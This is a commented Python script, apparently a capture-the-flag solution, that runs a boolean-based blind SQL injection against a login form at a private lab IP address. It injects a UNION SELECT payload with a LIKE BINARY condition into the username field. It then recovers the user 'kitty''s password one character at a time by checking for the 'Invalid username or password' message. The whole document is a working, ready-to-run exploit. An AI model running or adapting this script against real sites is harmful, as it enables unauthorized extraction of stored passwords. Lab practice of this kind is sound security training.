完整脚本（Full script: boolean-based blind SQL injection that recovers a password one character at a time via the login form's "Invalid username or password" oracle）

import requests

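url = 'http://10.10.196.247/index.php'
# Candidate characters, tried in this order for every position.
# NOTE: `_` is also the single-character wildcard of SQL LIKE, so it is escaped
# in the pattern (see like_escape); unescaped it silently matches *any* character
# and corrupts the recovered value.
dicts = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}'
flag = ''

# Text the login page returns when the injected query yields no row; its absence
# is the boolean oracle.  A transport error or 500 page would also lack this
# string, hence the status check in post_oracle.
ERROR_TEXT = "Invalid username or password"
MAX_LEN = 99      # same bound as the original `range(1, 100)` loop
TIMEOUT = 10      # seconds per request; without it a hung request blocks forever


def like_escape(text: str) -> str:
    """Escape the LIKE metacharacters `%` and `_` so they match literally.

    MySQL keeps `\\%` and `\\_` intact inside a quoted string literal precisely
    for use in LIKE patterns, so no ESCAPE clause is needed.  A backslash is not
    handled (it is not in `dicts`).
    """
    return text.replace("%", "\\%").replace("_", "\\_")


def build_payload(candidate: str) -> str:
    """Return the injected `username` value that tests whether kitty's password
    starts with *candidate* (case-sensitively, via BINARY).

    The UNION keeps the column count (1,2,3,4) the page expects, so the login
    only "succeeds" when the LIKE condition holds.  `-- ` needs a trailing
    space; the `+` after it is there so the space survives form decoding.
    """
    pattern = like_escape(candidate)
    return (
        f"' UNION SELECT 1,2,3,4 from siteusers where username like 'kitty' "
        f"and password like BINARY '{pattern}%'-- +"
    )


def post_oracle(session, payload: str) -> bool:
    """POST *payload* as the username; True when the page did not reject the login.

    Raises `requests.HTTPError` on a non-2xx reply so a server error is not
    mistaken for a hit (an error page also lacks ERROR_TEXT).
    """
    res = session.post(
        url,
        data={'username': payload, 'password': "payload"},
        timeout=TIMEOUT,
    )
    res.raise_for_status()
    return ERROR_TEXT not in res.text


def extract(oracle, charset: str = dicts, max_len: int = MAX_LEN) -> str:
    """Recover a secret one character at a time with a boolean *oracle*.

    ``oracle(candidate)`` must return True iff the secret starts with
    *candidate*.  Characters are tried in *charset* order; extraction stops at
    the first position where no candidate matches (end of the secret, or a
    character outside *charset*) or after *max_len* characters.
    """
    found = ''
    for _ in range(max_len):
        for ch in charset:
            if oracle(found + ch):
                found += ch
                print(f"now flag: {found}")
                break
        else:
            # No candidate matched: either the secret ended or it contains a
            # character that is not in `charset`.
            print("nonono")
            break
    return found


if __name__ == "__main__":
    # One Session reuses the TCP connection across the hundreds of requests.
    with requests.Session() as session:
        flag = extract(lambda candidate: post_oracle(session, build_payload(candidate)))
    print(f"end flag: {flag}")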